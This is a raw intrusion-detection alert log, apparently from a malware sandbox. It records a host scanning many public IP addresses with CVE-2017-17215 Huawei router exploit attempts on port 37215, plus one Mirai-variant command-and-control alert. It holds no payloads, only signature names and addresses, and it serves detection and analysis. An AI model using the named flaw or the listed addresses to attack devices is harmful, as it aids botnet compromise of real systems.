                                            06/14/24-10:44:24.943000TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6025637215192.168.2.1441.223.14.231
                                            06/14/24-10:44:00.323489TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4091837215192.168.2.14156.196.139.60
                                            06/14/24-10:43:36.704720TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3399637215192.168.2.14197.45.22.82
                                            06/14/24-10:44:08.519856TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5253837215192.168.2.14156.1.178.143
                                            06/14/24-10:43:36.718178TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5556237215192.168.2.1441.25.184.121
                                            06/14/24-10:43:58.295500TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5030237215192.168.2.14197.213.202.84
                                            06/14/24-10:44:00.340583TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4977837215192.168.2.1441.182.59.230
                                            06/14/24-10:44:33.151081TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5763237215192.168.2.14197.225.104.17
                                            06/14/24-10:43:45.966209TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4549037215192.168.2.1441.52.170.70
                                            06/14/24-10:43:48.033904TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5261637215192.168.2.1441.38.165.136
                                            06/14/24-10:44:18.763627TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4732437215192.168.2.14156.63.118.179
                                            06/14/24-10:43:43.969580TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5766837215192.168.2.14197.162.83.24
                                            06/14/24-10:43:39.810027TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4919637215192.168.2.14156.2.241.249
                                            06/14/24-10:43:48.020470TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3923637215192.168.2.14197.41.33.124
                                            06/14/24-10:44:04.422140TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5638837215192.168.2.14197.87.48.166
                                            06/14/24-10:43:36.702172TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5437037215192.168.2.1441.51.17.68
                                            06/14/24-10:43:34.660975TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4020037215192.168.2.14197.92.82.210
                                            06/14/24-10:44:04.420035TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4914237215192.168.2.1441.181.6.96
                                            06/14/24-10:43:43.942509TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4550437215192.168.2.14197.252.93.18
                                            06/14/24-10:44:06.452721TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5042237215192.168.2.14156.144.169.211
                                            06/14/24-10:44:22.861680TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3761237215192.168.2.1441.66.110.143
                                            06/14/24-10:43:34.661205TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4626437215192.168.2.1441.38.84.36
                                            06/14/24-10:43:56.225437TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3343237215192.168.2.14156.255.44.159
                                            06/14/24-10:44:14.687393TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5316837215192.168.2.14156.39.225.102
                                            06/14/24-10:43:52.150806TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6069037215192.168.2.1441.2.131.174
                                            06/14/24-10:44:00.325360TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5588237215192.168.2.14197.219.69.55
                                            06/14/24-10:44:35.179901TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4004637215192.168.2.14197.57.111.48
                                            06/14/24-10:44:26.979978TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5261237215192.168.2.1441.59.28.227
                                            06/14/24-10:43:34.676146TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5134837215192.168.2.14156.239.255.247
                                            06/14/24-10:44:20.829544TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4572837215192.168.2.14156.170.159.36
                                            06/14/24-10:44:33.152146TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4016237215192.168.2.14156.12.29.65
                                            06/14/24-10:44:33.134167TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5475837215192.168.2.1441.44.16.175
                                            06/14/24-10:44:14.682569TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3378437215192.168.2.14197.89.62.117
                                            06/14/24-10:43:34.679542TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3950037215192.168.2.14197.114.97.36
                                            06/14/24-10:44:31.053503TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5210837215192.168.2.14156.14.224.198
                                            06/14/24-10:44:16.732520TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3601237215192.168.2.14156.246.96.131
                                            06/14/24-10:43:54.182681TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6047837215192.168.2.14156.205.237.221
                                            06/14/24-10:44:24.917555TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3761037215192.168.2.14156.150.175.102
                                            06/14/24-10:43:43.970879TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4609637215192.168.2.14197.127.138.223
                                            06/14/24-10:43:45.968004TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6049837215192.168.2.14197.151.213.69
                                            06/14/24-10:44:12.618791TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3571237215192.168.2.1441.67.165.9
                                            06/14/24-10:44:31.053624TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4598037215192.168.2.14197.42.204.121
                                            06/14/24-10:44:22.879873TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3944837215192.168.2.14156.232.54.89
                                            06/14/24-10:44:24.944028TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3857037215192.168.2.14156.235.193.8
                                            06/14/24-10:43:56.228654TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5242237215192.168.2.1441.212.76.251
                                            06/14/24-10:44:33.148733TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5863037215192.168.2.1441.122.93.136
                                            06/14/24-10:44:02.367586TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5168637215192.168.2.14156.179.180.41
                                            06/14/24-10:44:12.614082TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5445437215192.168.2.14156.241.99.127
                                            06/14/24-10:43:34.663419TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4761637215192.168.2.14156.99.46.18
                                            06/14/24-10:44:08.501842TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5728237215192.168.2.14156.95.250.95
                                            06/14/24-10:44:00.326228TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3543837215192.168.2.14156.94.20.96
                                            06/14/24-10:43:56.228452TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6004037215192.168.2.1441.211.229.178
                                            06/14/24-10:43:52.150662TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4840437215192.168.2.14156.83.221.77
                                            06/14/24-10:43:36.728142TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5985037215192.168.2.14197.34.83.107
                                            06/14/24-10:44:29.014445TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5946237215192.168.2.1441.233.66.114
                                            06/14/24-10:43:56.246272TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4990637215192.168.2.1441.97.217.229
                                            06/14/24-10:43:54.184762TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3840037215192.168.2.14156.141.145.153
                                            06/14/24-10:43:56.245479TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5268237215192.168.2.14156.133.193.224
                                            06/14/24-10:43:56.227858TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3928437215192.168.2.1441.51.67.3
                                            06/14/24-10:43:50.115090TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3675037215192.168.2.14156.164.26.1
                                            06/14/24-10:44:33.152691TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5466837215192.168.2.14197.233.211.110
                                            06/14/24-10:44:14.684423TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4615237215192.168.2.14197.236.117.80
                                            06/14/24-10:44:14.682511TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5544237215192.168.2.14156.236.36.106
                                            06/14/24-10:44:33.134607TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3767437215192.168.2.1441.19.238.183
                                            06/14/24-10:43:39.813216TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4157437215192.168.2.14197.143.19.164
                                            06/14/24-10:43:58.290471TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3548037215192.168.2.14156.106.185.6
                                            06/14/24-10:44:22.858180TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4203437215192.168.2.1441.87.222.206
                                            06/14/24-10:43:41.896363TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5918837215192.168.2.14156.218.178.89
                                            06/14/24-10:44:33.149483TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5934237215192.168.2.14197.140.73.26
                                            06/14/24-10:44:24.934817TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4693437215192.168.2.14197.132.227.32
                                            06/14/24-10:43:48.016438TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3316437215192.168.2.1441.67.106.214
                                            06/14/24-10:43:48.034072TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4593837215192.168.2.14197.203.38.123
                                            06/14/24-10:43:36.724389TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3789837215192.168.2.1441.107.1.22
                                            06/14/24-10:43:48.034462TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3465437215192.168.2.1441.237.171.41
                                            06/14/24-10:43:58.277134TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3636637215192.168.2.14156.109.246.252
                                            06/14/24-10:44:06.450077TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4741237215192.168.2.1441.255.81.188
                                            06/14/24-10:43:56.229444TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3677237215192.168.2.14197.86.7.250
                                            06/14/24-10:44:29.025673TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5529437215192.168.2.14156.125.34.132
                                            06/14/24-10:43:37.759943TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5531637215192.168.2.14197.0.89.230
                                            06/14/24-10:44:12.618330TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4514037215192.168.2.1441.44.126.164
                                            06/14/24-10:44:35.176586TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4785837215192.168.2.14156.188.244.232
                                            06/14/24-10:44:16.717433TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4954837215192.168.2.14156.104.191.54
                                            06/14/24-10:44:16.718386TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6025237215192.168.2.1441.172.21.139
                                            06/14/24-10:44:16.732498TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5451037215192.168.2.1441.9.23.81
                                            06/14/24-10:44:06.470649TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4776637215192.168.2.14156.186.149.164
                                            06/14/24-10:44:08.502660TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5796637215192.168.2.14156.146.239.213
                                            06/14/24-10:44:31.079107TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4682837215192.168.2.14197.35.192.232
                                            06/14/24-10:44:14.684775TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5260437215192.168.2.14197.177.136.214
                                            06/14/24-10:43:36.725816TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4709637215192.168.2.1441.36.107.172
                                            06/14/24-10:43:58.293068TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3304637215192.168.2.14156.211.136.146
                                            06/14/24-10:44:20.803612TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5003437215192.168.2.14197.87.208.117
                                            06/14/24-10:43:43.941317TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5698437215192.168.2.1441.139.5.67
                                            06/14/24-10:44:31.092066TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5020237215192.168.2.14156.102.200.91
                                            06/14/24-10:43:36.705050TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4502437215192.168.2.14156.163.195.105
                                            06/14/24-10:44:08.517630TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4201637215192.168.2.14156.76.76.23
                                            06/14/24-10:44:24.946861TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5154837215192.168.2.14197.63.10.64
                                            06/14/24-10:43:45.989364TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4464637215192.168.2.1441.206.177.1
                                            06/14/24-10:44:20.827419TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6057637215192.168.2.14197.254.174.85
                                            06/14/24-10:44:14.682788TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3959437215192.168.2.14156.169.32.171
                                            06/14/24-10:43:36.718246TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6047637215192.168.2.14156.152.207.55
                                            06/14/24-10:43:36.700207TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4590437215192.168.2.14197.54.76.33
                                            06/14/24-10:43:41.850508TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3666837215192.168.2.14197.151.161.254
                                            06/14/24-10:44:22.861652TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5816237215192.168.2.14156.235.162.6
                                            06/14/24-10:44:04.421847TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5355237215192.168.2.1441.10.13.146
                                            06/14/24-10:44:02.366442TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6089437215192.168.2.14156.123.35.39
                                            06/14/24-10:43:58.291871TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5060437215192.168.2.14197.186.32.163
                                            06/14/24-10:44:08.502966TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5939837215192.168.2.14197.64.123.13
                                            06/14/24-10:43:48.018861TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6019237215192.168.2.1441.7.158.123
                                            06/14/24-10:43:45.966501TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3943437215192.168.2.1441.21.239.148
                                            06/14/24-10:44:33.132020TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4264437215192.168.2.1441.20.221.49
                                            06/14/24-10:43:43.944515TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4786437215192.168.2.14197.200.199.220
                                            06/14/24-10:44:26.980439TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5256437215192.168.2.14197.165.155.159
                                            06/14/24-10:43:37.763022TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5768637215192.168.2.14197.43.135.32
                                            06/14/24-10:43:45.988923TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6040637215192.168.2.14197.113.101.161
                                            06/14/24-10:44:33.149230TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4146037215192.168.2.14156.205.255.151
                                            06/14/24-10:43:50.115213TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3901437215192.168.2.14197.97.108.145
                                            06/14/24-10:44:06.452972TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5734037215192.168.2.14156.164.198.139
                                            06/14/24-10:43:41.905919TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4452437215192.168.2.1441.109.207.251
                                            06/14/24-10:43:48.033456TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5054037215192.168.2.14156.197.43.129
                                            06/14/24-10:44:29.022055TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5752237215192.168.2.1441.28.70.98
                                            06/14/24-10:43:41.847641TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3623237215192.168.2.1441.2.252.238
                                            06/14/24-10:43:56.245864TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4852437215192.168.2.14156.114.178.183
                                            06/14/24-10:44:14.684821TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4185037215192.168.2.14197.186.175.246
                                            06/14/24-10:44:12.579346TCP2840516ETPRO TROJAN ELF/BASHLITE/Mirai Cayosin Variant CnC Server Message233872443.231.232.101192.168.2.14
                                            06/14/24-10:43:37.759298TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5736237215192.168.2.14197.142.21.60
                                            06/14/24-10:44:29.024652TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4309637215192.168.2.1441.136.253.198
                                            06/14/24-10:44:20.807103TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5109437215192.168.2.1441.94.225.204
                                            06/14/24-10:43:50.112114TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4504637215192.168.2.14197.121.49.232
                                            06/14/24-10:44:04.422821TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5277837215192.168.2.14156.39.12.66
                                            06/14/24-10:43:48.019701TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3591237215192.168.2.14156.128.105.127
                                            06/14/24-10:44:02.367119TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3421837215192.168.2.14156.141.136.21
                                            06/14/24-10:44:06.450492TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5456237215192.168.2.1441.41.24.236
                                            06/14/24-10:43:45.967213TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5763037215192.168.2.14197.232.164.114
                                            06/14/24-10:44:06.472646TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6024437215192.168.2.1441.195.149.85
                                            06/14/24-10:43:41.845894TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5405037215192.168.2.14156.92.102.202
                                            06/14/24-10:43:54.198587TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5938837215192.168.2.14197.19.92.170
                                            06/14/24-10:43:34.662674TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4051837215192.168.2.14156.59.39.131
                                            06/14/24-10:44:06.470511TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4452437215192.168.2.1441.198.246.93
                                            06/14/24-10:44:26.979020TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6065437215192.168.2.14197.201.185.153
                                            06/14/24-10:44:04.409468TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5322837215192.168.2.14197.140.9.24
                                            06/14/24-10:43:58.294977TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3312237215192.168.2.1441.0.164.226
                                            06/14/24-10:44:31.092450TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3510237215192.168.2.14156.79.114.184
                                            06/14/24-10:44:20.828371TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3349837215192.168.2.14156.106.1.189
                                            06/14/24-10:43:50.115650TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3830637215192.168.2.14156.104.67.45
                                            06/14/24-10:44:20.804945TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4525437215192.168.2.1441.119.234.121
                                            06/14/24-10:43:34.676448TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4114837215192.168.2.1441.65.170.88
                                            06/14/24-10:43:58.294263TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4120437215192.168.2.1441.109.216.11
                                            06/14/24-10:44:06.471305TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4179437215192.168.2.1441.147.97.19
                                            06/14/24-10:44:22.878177TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3349637215192.168.2.1441.145.103.112
                                            06/14/24-10:44:10.565397TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3804037215192.168.2.1441.160.126.8
                                            06/14/24-10:44:35.177940TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5281437215192.168.2.14197.132.192.124
                                            06/14/24-10:43:48.030073TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5353037215192.168.2.14197.240.52.97
                                            06/14/24-10:43:58.277492TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3399837215192.168.2.1441.89.226.56
                                            06/14/24-10:43:48.029377TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5284837215192.168.2.1441.238.201.145
                                            06/14/24-10:43:58.289799TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5067037215192.168.2.1441.129.20.16
                                            06/14/24-10:44:04.424281TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6089237215192.168.2.14197.163.24.154
                                            06/14/24-10:43:58.288962TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5272637215192.168.2.14197.180.54.132
                                            06/14/24-10:43:48.033817TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4706437215192.168.2.14197.89.209.40
                                            06/14/24-10:43:48.028743TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4158237215192.168.2.1441.204.52.97
                                            06/14/24-10:44:31.055414TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5201837215192.168.2.14197.36.179.89
                                            06/14/24-10:44:14.687257TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4750437215192.168.2.1441.126.6.43
                                            06/14/24-10:43:48.017191TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3727837215192.168.2.1441.225.205.94
                                            06/14/24-10:44:02.366309TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4327637215192.168.2.14156.61.0.27
                                            06/14/24-10:44:26.999650TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4574837215192.168.2.14156.75.240.172
                                            06/14/24-10:44:29.025011TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5851837215192.168.2.14156.254.231.161
                                            06/14/24-10:43:58.277626TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5670837215192.168.2.14197.135.25.193
                                            06/14/24-10:44:04.406833TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4865037215192.168.2.14156.96.156.139
                                            06/14/24-10:43:48.033865TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4915437215192.168.2.14197.175.144.218
                                            06/14/24-10:44:00.323458TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4706237215192.168.2.14197.209.160.104
                                            06/14/24-10:44:24.915635TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5456637215192.168.2.14156.68.100.96
                                            06/14/24-10:44:26.977956TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4865037215192.168.2.1441.69.228.34
                                            06/14/24-10:43:41.845845TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3406837215192.168.2.1441.204.119.255
                                            06/14/24-10:44:16.716913TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3287037215192.168.2.14156.207.84.153
                                            06/14/24-10:43:41.900139TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3450637215192.168.2.14197.158.248.80
                                            06/14/24-10:44:16.733160TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4678637215192.168.2.14197.172.103.190
                                            06/14/24-10:43:54.181849TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3821437215192.168.2.1441.40.99.143
                                            06/14/24-10:44:14.682872TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3455837215192.168.2.14197.31.227.10
                                            06/14/24-10:43:52.165061TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5515237215192.168.2.14156.178.94.203
                                            06/14/24-10:43:39.789705TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3452237215192.168.2.14156.244.1.164
                                            06/14/24-10:43:48.032689TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3603237215192.168.2.14156.86.151.194
                                            06/14/24-10:44:20.828344TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4922037215192.168.2.1441.132.229.125
                                            06/14/24-10:43:50.073823TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4738037215192.168.2.14156.176.181.253
                                            06/14/24-10:43:52.150619TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4477237215192.168.2.1441.165.139.159
                                            06/14/24-10:44:16.719002TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5985237215192.168.2.14156.80.186.31
                                            06/14/24-10:43:45.967799TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3304637215192.168.2.14156.61.13.199
                                            06/14/24-10:43:58.295392TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4124237215192.168.2.14156.253.244.160
                                            06/14/24-10:44:02.381511TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3715837215192.168.2.14197.201.47.205
                                            06/14/24-10:43:34.679561TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4600037215192.168.2.14197.115.0.107
